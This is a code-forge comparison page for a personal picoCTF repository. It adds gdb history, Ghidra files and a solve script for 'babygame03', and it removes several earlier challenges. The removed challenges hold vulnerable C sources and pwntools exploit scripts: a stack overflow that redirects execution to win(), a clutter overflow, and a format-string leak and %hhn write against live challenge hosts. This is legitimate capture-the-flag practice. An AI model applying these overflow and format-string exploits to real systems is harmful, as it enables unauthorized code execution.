theon-1/picoCTF
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: theon-1:main
Branches Tags
theon-1:main theon-1:weird_snake theon-1:win_anti_dbg_100 theon-1:endianness_v2 theon-1:poweranalysis_part_1 theon-1:flag_printer theon-1:babygame03
..
compare: theon-1:babygame03
Branches Tags
theon-1:main theon-1:weird_snake theon-1:win_anti_dbg_100 theon-1:endianness_v2 theon-1:poweranalysis_part_1 theon-1:flag_printer theon-1:babygame03

2 Commits
main ... babygame03

Author SHA1 Message Date
Maxime Vorwerk
cc9cccfe97 babygame03_temp 2025-02-15 18:37:15 +01:00
Maxime Vorwerk
c88f5b4ea4 Mob psycho 2025-02-14 11:39:10 +01:00
804 changed files with 420 additions and 2042 deletions
Expand all files Collapse all files

12
.envrc
View File

@@ -1,12 +0,0 @@
export MAMBA_EXE='/home/maxime/.local/bin/micromamba';
export MAMBA_ROOT_PREFIX='/home/maxime/.micromamba';
__mamba_setup="$("$MAMBA_EXE" shell hook --shell zsh --root-prefix "$MAMBA_ROOT_PREFIX" 2> /dev/null)"
if [ $? -eq 0 ]; then
eval "$__mamba_setup"
else
alias micromamba="$MAMBA_EXE" # Fallback on help from micromamba activate
fi
unset __mamba_setup
micromamba activate picoCTF

7
README.md
View File

@@ -1,7 +0,0 @@
# picoCTF
## programs used
- TrID
- exiftool
- aircrack-ng
- kaitai

256
babygame03/.gdb_history Normal file
View File

@@ -0,0 +1,256 @@
c
c
x/40x 0xffffbd00
c
c
run
c
run
c
x/40x 0xffffbd00
c
run
exit
b *move_player
run < out
c
c
x/40x 0xffffbd00
c
x/40x 0xffffbd00
disassemble main
b *main+39
run < out
stack
stack 20
clear *main+3
clear *main+39
b *main+93
run < out
stack 20
stack 20
stack 40
stack 60
stack 80
stack 100
stack 200
stack 100
stack 110
stack 400
stack 1000
stack 600
stack 700
stack 680
stack 690
stack 685
stack 686
stack 687
stack 688
stack 689
stack 688
x/x 0xffffdb0c
x/x 0xffffbd0c
continue
c
run < out
x/x 0xffffbd0c
c
continue
run < out
c
x/x 0xffffbd0c
c
x/x 0xffffbd0c
disassemble main
b *main+372
x/x 0xffffbd0c
c
c
c
c
c
c
c
c
c
c
c
c
c
c
c
c
c
c
c
c
c
c
b
clear 5
exit
disassemble main
x/x 0xffffbd0c
b *move_player
run < out
x/x 0xffffbd0c
x/40x 0xffffbd00
x/40x 0xffffcd00
x/40x 0xffffbd00
x/40x 0xffffbf00
x/40x 0xffffbd00
x/40x 0xffffbd00
x/40x 0xffffbd00
x/40x 0xffffc000
x/40x 0xffffc400
x/40x 0xffffc600
x/40x 0xffffc800
x/40x 0xffffc700
x/40x 0xffffc780
x/40x 0xffffbd00
x/40x 0xffffc780
x/x 0xffffc7ac
x/x 0xffffbd0c
x/40x 0xffffbd00
exit
b *move_player
x/x 0xffffbd0c
x/x 0xffffc7ac
run < out2
x/x 0xffffc7ac
x/x 0xffffbd0c
c
c
x/x 0xffffc7ac
c
x/x 0xffffc7ac
run < out2
x/x 0xffffc7ac
x/x 0xffffbd0c
c
x/x 0xffffc7ac
c
x/x 0xffffc7ac
x/40x 0xffffbd00
exit
disassemble main
disassemble move_player
b *move_player+8
run
stack 20
stack 30
x/40x 0xffa890
x/40x 0xffffa890
exit
b *move_player+8
run
stack 20
c
c
stack 20
x/40x 0xffffa890
c
x/40x 0xffffa890
c
x/40x 0xffffa890
c
x/40x 0xffffa890
c
x/40x 0xffffa890
c
x/40x 0xffffa890
c
x/40x 0xffffa890
c
x/40x 0xffffa890
c
x/40x 0xffffa890
c
exit
exit
disassemble main
q
disassemble main
disassemble move_
disassemble move_player
b *move_player+357
run < out
c
run < out
c
exit
b *move_player+357
run < out3
c
stack 20
x/40x 0xffffbce0
x/40x 0xffffbcf0
x/40x 0xffffbe00
x/40x 0xffffbd0
x/40x 0xffffbd00
x/40x 0xffffbd2f
x/40x 0xffffbd00
x/40x 0xffffbc00
x/40x 0xffffbcd0
stack 30
stack 800
stack 700
stack 720
stack 700
stack 710
stack 720
disassemble main
stack 40
stack -1 40
stack 40 -1
stack 40 -10
stack 40
stack 40
x/40x 0xffffbcd0
x/40x 0xffffbce0
c
c
c
c
c
run < out3
c
run
c
c
c
c
c
c
c
exit
disassemble move_player
b *move_player+357
run < out2
c
stack 40
x/40x 0xffffbce0
c
x/40x 0xffffbce0
run < out2
c
x/40x 0xffffbce0
c
x/40x 0xffffbce0
c
x/40x 0xffffbce0
c
x/40x 0xffffbce0
run < out2
c
x/40x 0xffffbce0
c
c
exit
disassemble main
b *main+378
run < args
run < args
run < args
tic
exit

2
babygame03/args Normal file
View File

@@ -0,0 +1,2 @@
aaaaaaaawwwwspaaaaaaaawwwwspaaaaaaaawwwwspaaaaaaaawwwwsaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaalpwsaaaaaaaawwwwswws

0
basic_file_exploit/notes.md → babygame03/babygame03.gpr
View File

9
babygame03/babygame03.lock Normal file
View File

@@ -0,0 +1,9 @@
#Ghidra Lock File
#Mon Nov 18 09:14:36 CET 2024
<META>\ Supports\ File\ Channel\ Locking=Channel Lock
Hostname=theon-1
OS\ Architecture=amd64
OS\ Name=Linux
OS\ Version=6.11.6-arch1-1
Timestamp=11/18/24, 9\:14\u202FAM
Username=maxime

0
babygame03/babygame03.lock~ Normal file
View File

11
babygame03/babygame03.rep/idata/00/00000001.prp Normal file
View File

@@ -0,0 +1,11 @@
<?xml version="1.0" encoding="UTF-8"?>
<FILE_INFO>
<BASIC_INFO>
<STATE NAME="CONTENT_TYPE" TYPE="string" VALUE="Program" />
<STATE NAME="PARENT" TYPE="string" VALUE="/" />
<STATE NAME="FILE_ID" TYPE="string" VALUE="ac10290b32f38007603038077" />
<STATE NAME="FILE_TYPE" TYPE="int" VALUE="0" />
<STATE NAME="READ_ONLY" TYPE="boolean" VALUE="false" />
<STATE NAME="NAME" TYPE="string" VALUE="game" />
</BASIC_INFO>
</FILE_INFO>

BIN
babygame03/babygame03.rep/idata/00/~00000001.db/db.23.gbf Normal file
View File

Binary file not shown.

BIN
babygame03/babygame03.rep/idata/00/~00000001.db/tmp4333563501973116122.ps Normal file
View File

Binary file not shown.

7
babygame03/babygame03.rep/idata/~index.bak Normal file
View File

@@ -0,0 +1,7 @@
VERSION=1
/
00000001:game:ac10290b32f38007603038077
/New Traces
00000002:Emulate game:ac10290839926930849280384
NEXT-ID:3
MD5:d41d8cd98f00b204e9800998ecf8427e

5
babygame03/babygame03.rep/idata/~index.dat Normal file
View File

@@ -0,0 +1,5 @@
VERSION=1
/
00000001:game:ac10290b32f38007603038077
NEXT-ID:3
MD5:d41d8cd98f00b204e9800998ecf8427e

2
babygame03/babygame03.rep/idata/~journal.bak Normal file
View File

@@ -0,0 +1,2 @@
IDEL:/New Traces/Emulate game
FDEL:/New Traces

6
babygame03/babygame03.rep/project.prp Normal file
View File

@@ -0,0 +1,6 @@
<?xml version="1.0" encoding="UTF-8"?>
<FILE_INFO>
<BASIC_INFO>
<STATE NAME="OWNER" TYPE="string" VALUE="maxime" />
</BASIC_INFO>
</FILE_INFO>

15
babygame03/babygame03.rep/projectState Normal file
View File

@@ -0,0 +1,15 @@
<?xml version="1.0" encoding="UTF-8"?>
<PROJECT>
<PROJECT_DATA_XML_NAME NAME="DISPLAY_DATA">
<SAVE_STATE>
<ARRAY NAME="EXPANDED_PATHS" TYPE="string">
<A VALUE="babygame03:" />
</ARRAY>
<STATE NAME="SHOW_TABLE" TYPE="boolean" VALUE="false" />
</SAVE_STATE>
</PROJECT_DATA_XML_NAME>
<TOOL_MANAGER ACTIVE_WORKSPACE="Workspace">
<WORKSPACE NAME="Workspace" ACTIVE="true" />
</TOOL_MANAGER>
</PROJECT>

11
babygame03/babygame03.rep/user/00/00000001.prp Normal file
View File

@@ -0,0 +1,11 @@
<?xml version="1.0" encoding="UTF-8"?>
<FILE_INFO>
<BASIC_INFO>
<STATE NAME="CONTENT_TYPE" TYPE="string" VALUE="ProgramUserData" />
<STATE NAME="PARENT" TYPE="string" VALUE="/" />
<STATE NAME="FILE_ID" TYPE="string" VALUE="ac10290b31146457713312322" />
<STATE NAME="FILE_TYPE" TYPE="int" VALUE="0" />
<STATE NAME="READ_ONLY" TYPE="boolean" VALUE="false" />
<STATE NAME="NAME" TYPE="string" VALUE="udf_ac10290b32f38007603038077" />
</BASIC_INFO>
</FILE_INFO>

BIN
babygame03/babygame03.rep/user/00/~00000001.db/db.2.gbf Normal file
View File

Binary file not shown.

BIN
babygame03/babygame03.rep/user/00/~00000001.db/tmp17811661305406265712.ps Normal file
View File

Binary file not shown.

4
babygame03/babygame03.rep/user/~index.bak Normal file
View File

@@ -0,0 +1,4 @@
VERSION=1
/
NEXT-ID:1
MD5:d41d8cd98f00b204e9800998ecf8427e

5
babygame03/babygame03.rep/user/~index.dat Normal file
View File

@@ -0,0 +1,5 @@
VERSION=1
/
00000001:udf_ac10290b32f38007603038077:ac10290b31146457713312322
NEXT-ID:2
MD5:d41d8cd98f00b204e9800998ecf8427e

2
babygame03/babygame03.rep/user/~journal.bak Normal file
View File

@@ -0,0 +1,2 @@
IADD:00000001:/udf_ac10290b32f38007603038077
IDSET:/udf_ac10290b32f38007603038077:ac10290b31146457713312322

4
babygame03/babygame03.rep/versioned/~index.bak Normal file
View File

@@ -0,0 +1,4 @@
VERSION=1
/
NEXT-ID:0
MD5:d41d8cd98f00b204e9800998ecf8427e

4
babygame03/babygame03.rep/versioned/~index.dat Normal file
View File

@@ -0,0 +1,4 @@
VERSION=1
/
NEXT-ID:0
MD5:d41d8cd98f00b204e9800998ecf8427e

1
babygame03/flag.txt Normal file
View File

@@ -0,0 +1 @@
flag{test}

BIN
babygame03/game Executable file
View File

Binary file not shown.

10
babygame03/mkstr.py Executable file
View File

@@ -0,0 +1,10 @@
#!/usr/bin/env python3
from pwn import *
a = 'aaaa'+'a'*4+'wwwws'
b = 'a'*47+'lp'+'ws'
s = a+'p' +a+'p' +a+'p' +a +b +a +'wws\n'
print(s)

1
babygame03/out Normal file
View File

@@ -0,0 +1 @@
aaaaaaaawwwws

1
babygame03/out2 Normal file
View File

@@ -0,0 +1 @@
aaaaaaaawwwwsaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaalpws

1
babygame03/out3 Normal file
View File

@@ -0,0 +1 @@
aaaaaaaawwwws

16
babygame03/sol.py Executable file
View File

@@ -0,0 +1,16 @@
#!/usr/bin/env python3
from pwn import *
s = b'aaaa'+b'a'*4+b'wwwws'
conn = process(["./game"])
for i in range(3):
conn.sendline(s)
conn.sendline(b'p')
conn.sendline(s)
conn.sendline(b'a'*47+b'l\x70'+b'ws')
conn.sendline(s)
conn.sendline(b'wws')
conn.sendline(b'a'*47+b'l\xfe'+b'w')
conn.interactive()

195
basic_file_exploit/program-redacted.c
View File

@@ -1,195 +0,0 @@
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <string.h>
#include <stdint.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/types.h>
#define WAIT 60
static const char* flag = "[REDACTED]";
static char data[10][100];
static int input_lengths[10];
static int inputs = 0;
int tgetinput(char *input, unsigned int l)
{
fd_set input_set;
struct timeval timeout;
int ready_for_reading = 0;
int read_bytes = 0;
if( l <= 0 )
{
printf("'l' for tgetinput must be greater than 0\n");
return -2;
}
/* Empty the FD Set */
FD_ZERO(&input_set );
/* Listen to the input descriptor */
FD_SET(STDIN_FILENO, &input_set);
/* Waiting for some seconds */
timeout.tv_sec = WAIT; // WAIT seconds
timeout.tv_usec = 0; // 0 milliseconds
/* Listening for input stream for any activity */
ready_for_reading = select(1, &input_set, NULL, NULL, &timeout);
/* Here, first parameter is number of FDs in the set,
* second is our FD set for reading,
* third is the FD set in which any write activity needs to updated,
* which is not required in this case.
* Fourth is timeout
*/
if (ready_for_reading == -1) {
/* Some error has occured in input */
printf("Unable to read your input\n");
return -1;
}
if (ready_for_reading) {
read_bytes = read(0, input, l-1);
if(input[read_bytes-1]=='\n'){
--read_bytes;
input[read_bytes]='\0';
}
if(read_bytes==0){
printf("No data given.\n");
return -4;
} else {
return 0;
}
} else {
printf("Timed out waiting for user input. Press Ctrl-C to disconnect\n");
return -3;
}
return 0;
}
static void data_write() {
char input[100];
char len[4];
long length;
int r;
printf("Please enter your data:\n");
r = tgetinput(input, 100);
// Timeout on user input
if(r == -3)
{
printf("Goodbye!\n");
exit(0);
}
while (true) {
printf("Please enter the length of your data:\n");
r = tgetinput(len, 4);
// Timeout on user input
if(r == -3)
{
printf("Goodbye!\n");
exit(0);
}
if ((length = strtol(len, NULL, 10)) == 0) {
puts("Please put in a valid length");
} else {
break;
}
}
if (inputs > 10) {
inputs = 0;
}
strcpy(data[inputs], input);
input_lengths[inputs] = length;
printf("Your entry number is: %d\n", inputs + 1);
inputs++;
}
static void data_read() {
char entry[4];
long entry_number;
char output[100];
int r;
memset(output, '\0', 100);
printf("Please enter the entry number of your data:\n");
r = tgetinput(entry, 4);
// Timeout on user input
if(r == -3)
{
printf("Goodbye!\n");
exit(0);
}
if ((entry_number = strtol(entry, NULL, 10)) == 0) {
puts(flag);
fseek(stdin, 0, SEEK_END);
exit(0);
}
entry_number--;
strncpy(output, data[entry_number], input_lengths[entry_number]);
puts(output);
}
int main(int argc, char** argv) {
char input[3] = {'\0'};
long command;
int r;
puts("Hi, welcome to my echo chamber!");
puts("Type '1' to enter a phrase into our database");
puts("Type '2' to echo a phrase in our database");
puts("Type '3' to exit the program");
while (true) {
r = tgetinput(input, 3);
// Timeout on user input
if(r == -3)
{
printf("Goodbye!\n");
exit(0);
}
if ((command = strtol(input, NULL, 10)) == 0) {
puts("Please put in a valid number");
} else if (command == 1) {
data_write();
puts("Write successful, would you like to do anything else?");
} else if (command == 2) {
if (inputs == 0) {
puts("No data yet");
continue;
}
data_read();
puts("Read successful, would you like to do anything else?");
} else if (command == 3) {
return 0;
} else {
puts("Please type either 1, 2 or 3");
puts("Maybe breaking boundaries elsewhere will be helpful");
}
}
return 0;
}

176
buffer_overflow_2/.gdb_history
View File

@@ -1,176 +0,0 @@
r
exit
exit
disassemble vuln
b *vuln+44
c
c
exit
b *vuln+44
c
stackf
disassemble vuln
b *vuln+29
exit
b *vuln+29
c
b *vuln+29
continue
disassemble vuln
b *vuln+44
c
stackf
hexdump
hexdump
hexdump help
hexdump $sp 20
hexdump $sp 20
hexdump $sp 100
hexdump $sp 120
hexdump $sp 140
hexdump $sp 160
c
c
b *vuln+44
c
stackf
disassemble win
b *win
c
stackf
disassemble win
b *win+11
c
stackf
c
b *win+11
c
c
exit
b *win+11
c
stackf
nexti
exit
disassemble vuln
b *vuln+75
c
disassemble vuln
b *vuln+57
c
nexti
stackf
disassemble vuln
disassemble win
hexdump $ebp+0x08
stackf
c
disassemble win
b *win+118
c
c
exit
b *win+118
c
b *vuln+57
c
stackf
nexti
stackf
disassemble win
b *win+16
c
stackf
disassemble win
stackf
hexdump $sp 100
hexdump $sp 200
c
c
b *win+16
c
hexdump $sp 200
stackf
c
c
c
exit
c
stackf
disassemble win
b *win+7
exit
b *win+7
c
stackf
hexdump $sp 200
c
exit
b *win+7
c
stackf
hexdump $sp 200
disassemble *main
exit
b *win+7
c
stackf
hexdump $sp 200
disassemble *win
nexti
disassemble *win
nexti
disassemble *win
nexti
disassemble *win
hexdump $sp 200
nexti
hexdump $sp 200
c
c
exit
disassemble *win
b *win+118
c
stackf
hexdump $sp 200
disassemble *win
b *win+118
c
hexdump $sp 200
disassemble *win
hexdump $ebp
b *win+118
c
disassemble *win
stackf
c
c
exit
b *win+118
c
stackf
disassemble win
hexdump $ebp
hexdump $ebp+8
nexti
nexti
stackf
b *win+118
c
nexti
nexti
hexdump $ebp
hexdump $ebp+8
hexdump $ebp+12
c
b *win+118
c
stackf
disassemble win
b *win+143
c
disassemble win
nexti
c
exit

1
buffer_overflow_2/flag.txt
View File

@@ -1 +0,0 @@
{test}

24
buffer_overflow_2/sol.py
View File

@@ -1,24 +0,0 @@
#!/usr/bin/env python
from pwn import *
context.terminal = "kitty"
win_address = 0x08049296
buffer_base = 0xfffe422c
ret_location = 0xfffe429c
ret_offset = ret_location - buffer_base
ebp_offset = 112
arg1 = 0xCAFEF00D
arg2 = 0xF00DF00D
conn = remote("saturn.picoctf.net", 56706)
#conn = process("./vuln")
#attach(conn)
conn.recvline()
conn.writeline(flat({ebp_offset+0x8:arg1, ebp_offset+0xc:arg2, ret_offset:win_address}, word_size=32))
conn.recvline()
rest = conn.recvuntil(b'}')
log.info(f"got {rest}")

BIN
buffer_overflow_2/vuln
View File

Binary file not shown.

44
buffer_overflow_2/vuln.c
View File

@@ -1,44 +0,0 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFSIZE 100
#define FLAGSIZE 64
void win(unsigned int arg1, unsigned int arg2) {
char buf[FLAGSIZE];
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("%s %s", "Please create 'flag.txt' in this directory with your",
"own debugging flag.\n");
exit(0);
}
fgets(buf,FLAGSIZE,f);
if (arg1 != 0xCAFEF00D)
return;
if (arg2 != 0xF00DF00D)
return;
printf(buf);
}
void vuln(){
char buf[BUFSIZE];
gets(buf);
puts(buf);
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
gid_t gid = getegid();
setresgid(gid, gid, gid);
puts("Please enter your string: ");
vuln();
return 0;
}

BIN
clutter_overflow/chall
View File

Binary file not shown.

54
clutter_overflow/chall.c
View File

@@ -1,54 +0,0 @@
#include <stdio.h>
#include <stdlib.h>
#define SIZE 0x100
#define GOAL 0xdeadbeef
const char* HEADER =
" ______________________________________________________________________\n"
"|^ ^ ^ ^ ^ ^ |L L L L|^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^|\n"
"| ^ ^ ^ ^ ^ ^| L L L | ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ |\n"
"|^ ^ ^ ^ ^ ^ |L L L L|^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ==================^ ^ ^|\n"
"| ^ ^ ^ ^ ^ ^| L L L | ^ ^ ^ ^ ^ ^ ___ ^ ^ ^ ^ / \\^ ^ |\n"
"|^ ^_^ ^ ^ ^ =========^ ^ ^ ^ _ ^ / \\ ^ _ ^ / | | \\^ ^|\n"
"| ^/_\\^ ^ ^ /_________\\^ ^ ^ /_\\ | // | /_\\ ^| | ____ ____ | | ^ |\n"
"|^ =|= ^ =================^ ^=|=^| |^=|=^ | | {____}{____} | |^ ^|\n"
"| ^ ^ ^ ^ | ========= |^ ^ ^ ^ ^\\___/^ ^ ^ ^| |__%%%%%%%%%%%%__| | ^ |\n"
"|^ ^ ^ ^ ^| / ( \\ | ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ |/ %%%%%%%%%%%%%% \\|^ ^|\n"
".-----. ^ || ) ||^ ^.-------.-------.^| %%%%%%%%%%%%%%%% | ^ |\n"
"| |^ ^|| o ) ( o || ^ | | | | /||||||||||||||||\\ |^ ^|\n"
"| ___ | ^ || | ( )) | ||^ ^| ______|_______|^| |||||||||||||||lc| | ^ |\n"
"|'.____'_^||/!\\@@@@@/!\\|| _'______________.'|== =====\n"
"|\\|______|===============|________________|/|\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n"
"\" ||\"\"\"\"||\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"||\"\"\"\"\"\"\"\"\"\"\"\"\"\"||\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\" \n"
"\"\"''\"\"\"\"''\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"''\"\"\"\"\"\"\"\"\"\"\"\"\"\"''\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n"
"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n"
"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"";
int main(void)
{
long code = 0;
char clutter[SIZE];
setbuf(stdout, NULL);
setbuf(stdin, NULL);
setbuf(stderr, NULL);
puts(HEADER);
puts("My room is so cluttered...");
puts("What do you see?");
gets(clutter);
if (code == GOAL) {
printf("code == 0x%llx: how did that happen??\n", GOAL);
puts("take a flag for your troubles");
system("cat flag.txt");
} else {
printf("code == 0x%llx\n", code);
printf("code != 0x%llx :(\n", GOAL);
}
return 0;
}

55
clutter_overflow/sol.py
View File

@@ -1,55 +0,0 @@
#!/usr/bin/env python
from pwn import *
def get_conn():
#return process("./chall")
return remote("mars.picoctf.net", 31890)
def try_memory_offset(offset):
cycle = cyclic(length=offset, n=8)
conn = get_conn()
conn.recvuntil(b"see?")
conn.recvline()
conn.sendline(cycle)
conn.recvuntil(b"== ")
result = conn.recvline(keepends=False)
conn.close()
return result
base = 0x100
exp = 0
p = log.progress("searching for variable offset")
while True:
offset = base + 2**exp
p.status(f"trying offset {offset}")
try:
result = try_memory_offset(offset)
except:
base = base + 2**(exp-1)
exp = 0
continue
if result != b"0x0":
next_result = 0
i = 0
while result != next_result:
i += 1
result = next_result
next_result = try_memory_offset(offset+i)
offset = cyclic_find(int(result, 16), n=8)
p.success(f"found result {unhex(result[2:])} at offset {offset}")
break
exp += 1
conn = get_conn()
conn.recvuntil(b"see?")
conn.recvline()
conn.sendline(b"a"*offset + p64(0xdeadbeef))
conn.interactive()

242
echo_valley/.gdb_history
View File

@@ -1,242 +0,0 @@
disassemble main
disassemble echo_valley
b *echo_valley+218
r
r
r
r
stackf
AAAA.%p.%p.%p.%p.%p.%p
r
nexti
r
stackf
nexti
r
stepi
stackf
next
next
next
next
next
next
next
next
next
next
next
next
next
next
nextret
next
r
stepi
stackf
nextret
nexti
stackf
r
disassemble echo_valley
stackf
help stackf
stackf 8 -10
stackf 8
stackf 8 10
stackf 8 -100
stackf 16 -10
hexdump $sp
hexdump $sp-0x60
hexdump $sp-0x60 100
hexdump $sp-0x60 1000
hexdump $sp-0x60 100
stackf
hexdump $sp-0x60 100
stackf
nextret
r
stackf
hexdump $sp-0x60 200
necti
nexti
stackf
r
stepi
stackf
r
stackf
nexti
stackf
r
stackf
stepi
stackf
nextret
r
stackf
stepi
stackf
nextret
exit
disassemble echo_valley
b *echo_valley+201
r
nexti
exit
disassemble echo_valley
b *echo_valley+218
r
nexti
stackf
exit
b *echo_valley+218
r
stackf
exit
b *echo_valley+218
r
nexti
stackf
exit
b *echo_valley+218
r
stackf
hexdump
hexdump 20
hexdump $sp 20
hexdump $sp 100
hexdump $sp 120
hexdump $sp 140
nexti
exit
b *echo_valley+218
r
nexti
stackf
hexdump $sp 140
exit()
lexit
exit
b *echo_valley+218
disassemble echo_valley
r
nexti
stackg
stackf
hexdump $sp 140
xit
exit
exit
nexti
nexti
r
exit
stackf
stackf
nexti
nextret
nextret
nextret
nextret
nextret
nextret
nextret
nextret
stackf
nextret
nextret
nextret
stackf
exit
exit
exit
disassemble echo-valley
disassemble echo_valley
nextret
nextret
exit
disassemble echo_valley
b *echo_valley+163
nextret
stackf
exit
disassemble echo_valley
b *echo_valley+218
r
help printf
printf "\01\02"
printf "\x01\x02"
printf "\x61\x62"
printf "\x41\x41"
disassemble valloc
exit
disassemble echo_valley
b *echo_valley+218
stackf
stackf help
stackf 20
stackf 20 -1
stackf 20 -2
stackf 20 1
stackf 20 2
stackf 20 3
stack-explore
stack
stackf
r
exit
b *echo_valley+218
exit
b *echo_valley+218
continue
stackf
nexti
stackf
exit
b *echo_valley+218
continue
nexti
stackf
exit
b *echo_valley+218
continue
nexti
exit
b *echo_valley+218
continue
nexti
hexdump $sp 140
continue
stackf
hexdump $sp 140
nexti
stackf
hexdump $sp 140
exit
b *echo_valley+218
continue
nexti
continue
nexti
stackf
hexdump $sp 140
exit
b *echo_valley+218
continue
hexdump $sp 140
nexti
hexdump $sp 140
exit
b *echo_valley+218
continue
hexdump $sp 140
nexti
hexdump $sp 140
continue
hexdump $sp 140
nexti
hexdump $sp 140
continue
exit
exit

51
echo_valley/manual.py
View File

@@ -1,51 +0,0 @@
#!/usr/bin/env python
from pwn import *
context.terminal = "kitty"
def write(data):
print(f"data to send: {data}")
return input("enter result: ").encode()
address_leak_string = write(b"AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p")
print(f"received {address_leak_string}")
dot = address_leak_string.rfind(b'.')
address_leak = int(address_leak_string[dot+1:], 16)
print(f"return address: {hex(address_leak)}")
dot2 = address_leak_string.rfind(b'.', 0, dot)
stack_address_leak_after_ret = int(address_leak_string[dot2+1:dot], 16)
stack_address_ret = stack_address_leak_after_ret - 8
print(f"found stack address of ret pointer: {hex(stack_address_ret)}")
address_offset = 18
main_offset = 0x1401
print_flag_offset = 0x1269
address_to_return_to = address_leak - address_offset - main_offset + print_flag_offset
print(f"jump address is: {hex(address_to_return_to)}")
# only 2 least significant address bytes have to be rewritten
print(f"first byte address: {p64(stack_address_ret)}")
# produces string that writes 0<=n<=255 to byte at address
# offset for alignment of memory address
# here, use offset 2
def produce_writer(n, address, offset=0, op=b"hhn"):
if n < 0:
log.error(f"n has to be >= 0, is {n}")
exit()
if n < 8:
n_pre = n
n_post = 8 - n_pre + offset
return b'.'*n_pre + b"%8$" + op + b'.'*n_post + address
else:
return f"%{n:03}$x..".encode() + b"%8$" + op + b'.'*offset + address
lower_byte_value = address_to_return_to%256
upper_byte_value = (address_to_return_to>>8)%256
print(f"lower byte value: {lower_byte_value}\nupper byte value: {upper_byte_value}")
write_lower_byte = write(produce_writer(0, p64(stack_address_ret), offset=2))
write_upper_byte = write(produce_writer(0, p64(stack_address_ret+1), offset=2))
conn.interactive(term.text.bold_red(">> "))

63
echo_valley/sol.py
View File

@@ -1,63 +0,0 @@
#!/usr/bin/env python
from pwn import *
#conn = process("./valley")
conn = remote("shape-facility.picoctf.net", 53287)
conn.recvline()
def write(data):
conn.sendline(data)
conn.recvuntil(b"e: ")
return conn.recvline(keepends=False)
address_leak_string = write(b"AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p")
log.info(f"received {address_leak_string}")
dot = address_leak_string.rfind(b'.')
address_leak = int(address_leak_string[dot+1:], 16)
log.info(f"return address: {hex(address_leak)}")
dot2 = address_leak_string.rfind(b'.', 0, dot)
stack_address_leak_after_ret = int(address_leak_string[dot2+1:dot], 16)
stack_address_ret = stack_address_leak_after_ret - 8
log.info(f"found stack address of ret pointer: {hex(stack_address_ret)}")
address_offset = 18
main_offset = 0x1401
print_flag_offset = 0x1269
address_to_return_to = address_leak - address_offset - main_offset + print_flag_offset
log.info(f"jump address is: {hex(address_to_return_to)}")
# only 2 least significant address bytes have to be rewritten
log.info(f"first byte address: {p64(stack_address_ret)}")
# produces string that writes 0<=n<=255 to byte at address
# offset for alignment of memory address
# here, use offset 2
def produce_writer(n, address, offset=0, op=b"hhn"):
if n < 0:
log.error(f"n has to be >= 0, is {n}")
exit()
if n < 8:
n_pre = n
n_post = 8 - n_pre + offset
return b'.'*n_pre + b"%8$" + op + b'.'*n_post + address
else:
return f"%{(n-3):03}x...".encode() + b"%8$" + op + b'.'*offset + address
lower_byte_value = address_to_return_to%256
upper_byte_value = (address_to_return_to>>8)%256
lower_byte_writer = produce_writer(lower_byte_value, p64(stack_address_ret), offset=2)
log.info(f"writing lower byte value to {hex(lower_byte_value)} on enter with string {lower_byte_writer}")
write_lower_byte = conn.sendline(lower_byte_writer)
upper_byte_writer = produce_writer(upper_byte_value, p64(stack_address_ret+1), offset=2)
log.info(f"writing upp byte value to {hex(upper_byte_value)} on enter with string {upper_byte_writer}")
write_upper_byte = conn.sendline(upper_byte_writer)
conn.sendline(b"exit")
conn.recvuntil(b"The Valley Disappears\n")
rest = conn.recvall()
log.info(f"got {rest}")

BIN
echo_valley/valley
View File

Binary file not shown.

49
echo_valley/valley.c
View File

@@ -1,49 +0,0 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void print_flag() {
char buf[32];
FILE *file = fopen("/home/valley/flag.txt", "r");
if (file == NULL) {
perror("Failed to open flag file");
exit(EXIT_FAILURE);
}
fgets(buf, sizeof(buf), file);
printf("Congrats! Here is your flag: %s", buf);
fclose(file);
exit(EXIT_SUCCESS);
}
void echo_valley() {
printf("Welcome to the Echo Valley, Try Shouting: \n");
char buf[100];
while(1)
{
fflush(stdout);
if (fgets(buf, sizeof(buf), stdin) == NULL) {
printf("\nEOF detected. Exiting...\n");
exit(0);
}
if (strcmp(buf, "exit\n") == 0) {
printf("The Valley Disappears\n");
break;
}
printf("You heard in the distance: ");
printf(buf);
fflush(stdout);
}
fflush(stdout);
}
int main()
{
echo_valley();
return 0;
}

2
flag_leak/.gdb_history
View File

@@ -1,2 +0,0 @@
disassemble main
exit

29
flag_leak/sol.py
